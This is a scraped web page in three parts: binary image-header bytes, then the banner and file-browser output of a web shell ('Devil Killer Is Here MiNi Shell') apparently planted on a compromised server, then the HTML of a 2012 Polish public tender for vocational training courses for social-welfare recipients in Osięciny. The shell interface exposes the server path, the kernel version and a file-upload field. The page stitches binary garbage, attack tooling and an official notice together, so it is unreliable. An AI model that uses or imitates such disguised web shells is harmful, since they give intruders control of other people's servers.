JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/214564-N-2012.html

<p class="kh_header"><b>Osięciny: Zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych w ramach projektu systemowego Czas na zmiany</b><br>
<b>Numer ogłoszenia: 214564 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. I Armii W.P. 14, 88-220 Osięciny, woj. kujawsko-pomorskie, tel. 54 2650 030 wew. 36, faks 54 2650030 wew.36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.osieciny.pl;  http://bip.ug-osieciny.samorzady.pl//</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych w ramach projektu systemowego Czas na zmiany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych, na które składają się kursy zawodowe, doradztwo zawodowe, doradztwo psychologiczne  dla 31 osób w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, nie pracujących zawodowo, w ramach projektu systemowego Czas na zmiany współfinansowanego  z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013; Priorytet VII - Promocja Aktywnej Integracji; Działanie 7.1. - Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1. - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.    
Na przedmiot zamówienia składają się następujące elementy:
1)Doradztwo  psychologiczne  dla 31 osób.
2)Doradztwo zawodowe dla 31 osób.
3) Kursy zawodowe w następujących specjalnościach:
a) kurs - profesjonalny sprzedawca z obsługą kasy fiskalnej dla 5 osób. Celem kursu jest przygotowanie uczestników do pracy w charakterze sprzedawcy oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216), zwanego dalej w treści SIWZ rozporządzeniem;
Ponadto celem szkolenia jest przygotowanie uczestników do wykonywania pracy na stanowisku sprzedawcy z umiejętnością obsługi kas fiskalnych i fakturowania. Podczas szkolenia uczestnik powinien  także nabyć umiejętności dotyczące marketingowych technik sprzedaży rozszerzonych o obsługę programów magazynowych i fakturujących. Plan szkolenia w swoim zakresie powinien obejmować: przepisy prawno-fiskalne, dokumenty fiskalne i niefiskalne, podstawowe zagadnienia prawne związane z instalacją, wykorzystaniem i zgłaszaniem do Urzędu Skarbowego posiadanych urządzeń fiskalnych, obsługę przynajmniej dwóch różnych typów kas, zawieranie transakcji sprzedaży, kształtowanie cen w jednostkach sprzedaży, wyposażenie punktu sprzedaży detalicznej, zaopatrzenie i zakup towarów w jednostce handlu detalicznego, organizację gospodarki magazynowej, marketing i reklamę w handlu detalicznym, obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży. 
Zajęcia warsztatowe natomiast muszą obejmować: obsługę cyfrowych kas fiskalnych i innych urządzeń fiskalnych, obsługę kas fiskalnych prostych jednostanowiskowych, obsługę kas fiskalnych współpracujących z wagą, czytnikiem i komputerem, obsługę fiskalnych kas komputerowych. 
Zakładając, że część uczestników nie posiada umiejętności obsługi komputera, zagadnienia szkolenia muszą zawierać podstawową terminologią informatyczną, zapoznanie z pracą w systemie operacyjnym Windows, poznanie zasad edycji tekstów MS Word, tworzenie arkuszy kalkulacyjnych w MS Excel, korzystanie z zasobów i  możliwości sieci Internet.
Forma organizacji szkolenia: 
- Kurs powinien odbywać się w specjalnie do tego celu przygotowanej pracowni  wyposażonej   w odpowiednią liczbę stanowisk z dostępem do kas fiskalnych i komputera z dostępem do Internetu, tj. co najmniej jedno stanowisko na 2 uczestników  szkolenia. 
- Szkolenie musi odbywać się w jednej  grupie, czas trwania szkolenia min 120 godzin szkoleniowych, z czego co najmniej 50 godzin muszą stanowić zajęcia praktyczne. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.  
- Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne.              Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu uprawnień sprzedawcy z obsługą kas fiskalnych.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny, ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i lub egzaminy odbywać się będą poza terenem gminy Osięciny, wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
- Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.


b) kurs - stylizacja paznokci i wizażu dla 1 osoby. Celem kursu jest przygotowanie uczestnika do pracy w charakterze stylisty paznokci, wizażysty oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia;
 Forma organizacji szkolenia: 
- Czas trwania szkolenia minimum 85 godzin szkoleniowych,  w tym 74 godziny zajęć praktycznych. Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne. Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu uprawnień w zakresie stylizacji paznakci i wizażu.
 - Wykonawca zapewni warunki szkolenia zgodnie  z obowiązującymi przepisami BHP oraz właściwe wyposażenie pod potrzeby zajęć teoretycznych i praktycznych. 
- Miejsce odbywania zajęć praktycznych powinno gwarantować solidne przygotowanie uczestników kursu i realizację programu szkolenia. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny,  ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem  gminy Osięciny wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
-Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.

c) kurs - opiekun osób chorych, starszych, niepełnosprawnych  i dzieci dla 4 osób. Celem kursu jest przygotowanie uczestnika do pracy w charakterze opiekuna oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu opiekuna osób chorych, starszych, niepełnosprawnych i dzieci.
Zakres tematyczny szkolenia obejmuje: 
- zapoznanie się z zasadami opieki nad osobami chorymi, starszymi, niepełnosprawnymi i dziećmi, 
- zdobycie wiedzy i umiejętności z zakresu profesjonalnej pielęgnacji i higieny osób wymagających pomocy w samodzielnej egzystencji w zakresie niezbędnym do wykonywania pracy w charakterze opiekuna.
 Forma organizacji szkolenia: 
- Czas trwania szkolenia minimum 120 godzin szkoleniowych,  w tym 95 godzin zajęć praktycznych. Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne. Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu uprawnień opiekuna osób chorych, starszych, niepełnosprawnych i dzieci. 
- Wykonawca dopełni wszelkich formalności związanych  z uzyskaniem przez uczestnika zaświadczenia lekarskiego potwierdzającego posiadaną zdolność do wykonywania zawodu opiekuna osób chorych, starszych, niepełnosprawnych i dzieci.
 - Wykonawca zapewni warunki szkolenia zgodnie  z obowiązującymi przepisami BHP oraz właściwe wyposażenie pod potrzeby zajęć teoretycznych i praktycznych. 
- Miejsce odbywania zajęć praktycznych powinno gwarantować solidne przygotowanie uczestników kursu i realizację programu szkolenia. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny,  ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem  gminy Osięciny wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
-Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.

d) kurs - prawo jazdy kat. B   dla 14 osób. Celem kursu jest przygotowanie osób ubiegających się o uprawnienia do kierowania pojazdami silnikowymi, do kierowania odpowiednimi rodzajami pojazdów lub zespołami pojazdów, w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu drogowego oraz wydanie zaświadczenia o ukończeniu kursu zgodnego z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów  (DzForma organizacji szkolenia: 
- Czas trwania szkolenia minimum 62 godziny szkoleniowe,  w tym 30 godzin zajęć praktycznych. Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne. Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu odpowiednich uprawnień. 
 - Wykonawca zapewni warunki szkolenia zgodnie  z obowiązującymi przepisami BHP oraz właściwe wyposażenie pod potrzeby zajęć teoretycznych i praktycznych. 
Sale wykładowe powinny być pzrystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne (np. tablica, projektor, rzutnik obrazu). Samochody, na których prowadzone będą zajęcia praktyczne muszą być w pełni sprawne techniczne.
-Wykonawca zapewnia: sprzęt niezbędny do pzreprowadzenia szkolenia, materiały szkoleniowe (podręczniki i płyty CD z testami egzaminacyjnymi), które zostaną przekazane uczestnikom na własność.
- Miejsce odbywania zajęć praktycznych powinno gwarantować solidne przygotowanie uczestników kursu i realizację programu szkolenia. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny,  ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem  gminy Osięciny wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
-Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.
e) kurs -prawo jazdy Kat.C dla 2 osób. Celem kursu jest przygotowanie osób ubiegających się o uprawnienia do kierowania pojazdami silnikowymi, do kierowania odpowiednimi rodzajami pojazdów lub zespołami pojazdów, w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu drogowego oraz wydanie zaświadczenia o ukończeniu kursu zgodnego z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów  (Dz.U. 2005 nr 217 poz. 1834
Forma organizacji szkolenia: 
- Czas trwania szkolenia minimum 52 godziny szkoleniowe,  w tym 30 godzin zajęć praktycznych. Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne. Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu odpowiednich uprawnień. 
 - Wykonawca zapewni warunki szkolenia zgodnie  z obowiązującymi przepisami BHP oraz właściwe wyposażenie pod potrzeby zajęć teoretycznych i praktycznych. 
Sale wykładowe powinny być pzrystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne (np. tablica, projektor, rzutnik obrazu). Samochody, na których prowadzone będą zajęcia praktyczne muszą być w pełni sprawne techniczne.
-Wykonawca zapewnia: sprzęt niezbędny do pzreprowadzenia szkolenia, materiały szkoleniowe (podręczniki i płyty CD z testami egzaminacyjnymi), które zostaną przekazane uczestnikom na własność.
- Miejsce odbywania zajęć praktycznych powinno gwarantować solidne przygotowanie uczestników kursu i realizację programu szkolenia. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny,  ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem  gminy Osięciny wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
-Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.


) kurs- kucharz dla 1 osoby. Celem kursu jest przygotowanie uczestnika do pracy w kuchni na stanowisku kucharza.
Forma organizacji szkolenia: 
- Czas trwania szkolenia minimum 150 godzin szkoleniowych,  w tym 130 godziny zajęć praktycznych. Do czasu trwania kursu zaliczony jest czas na: egzaminy wewnętrzne teoretyczne i praktyczne. Po zdaniu egzaminu końcowego uczestnik szkolenia otrzymuje zaświadczenie o ukończeniu kursu i uzyskaniu odpowiednich uprawnień.
 - Wykonawca zapewni warunki szkolenia zgodnie  z obowiązującymi przepisami BHP oraz właściwe wyposażenie pod potrzeby zajęć teoretycznych i praktycznych. 
- Miejsce odbywania zajęć praktycznych powinno gwarantować solidne przygotowanie uczestników kursu i realizację programu szkolenia. 
- Każdy uczestnik szkolenia otrzyma: program szkolenia, harmonogram zajęć, materiały szkoleniowe (tzn. podręczniki z zakresu tematyki szkolenia, zeszyty, materiały piśmienne itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów w/w kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem.
- Dopuszcza się możliwość przeprowadzenia zajęć praktycznych  i egzaminów praktycznych poza  gminą Osięciny,  ale muszą one odbywać się na terenie województwa kujawsko - pomorskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem  gminy Osięciny wówczas organizacja dowozu uczestników oraz koszty z tym związane leżą po stronie Wykonawcy.
-Na zakończenie kursu zawodowego Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa            
          Zamówienie poniżej 200.000 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia  zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się nie wystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej  działalności lub czynności, jeżeli Wykonawca wykaże, że jest wpisany do rejestru instytucji szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy , właściwy ze względu na siedzibę  instytuji szkoleniowej.
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty dokumentu  wymienionego  w pkt. 1 ppkt 1.2. Rozdziału  III  siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert,a jeżeli okres działalności jest krótszy- w tym okresie,  dwóch usług dla min. 10 osób polegających na zorganizowaniu  i przeprowadzeniu  kompleksowych usług  szkoleniowych, na które składają się kursy zawodowe, kurs prawa jazdy kat. B, kurs prawa jazdy kat. C, doradztwo zawodowe, doradztwo psychologiczne,  zgodnie z załącznikiem nr 7 do siwz wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane lub są wykonywane należycie.
       Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty dokumentu  wymienionego w pkt.1 ppkt 1.4. Rozdziału  III  siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym,  jeżeli Wykonawca oświadczy, że spełnia warunki udziału w postępowaniu określone w pkt 1  Rozdziału II siwz i art.22 ust.1 ustawy Pzp.
        Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego w pkt  1 ppkt 1.1. Rozdziału  III  siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca oświadczy, że dysponuje kadrą dydaktyczną posiadającą  wymagane przepisami uprawnienia do prowadzenia szkoleń będących przedmiotem zamówienia wg załącznika nr 8  do siwz.
         Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty  dokumentów   wymienionych w pkt. 1  ppkt 1.3. Rozdziału III siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli Wykonawca oświadczy,  że spełnia warunki udziału w postępowaniu określone w pkt 1  Rozdziału II siwz i art.22 ust.1 ustawy Pzp.
       Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego w pkt  1 ppkt 1.1. Rozdziału  III  siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

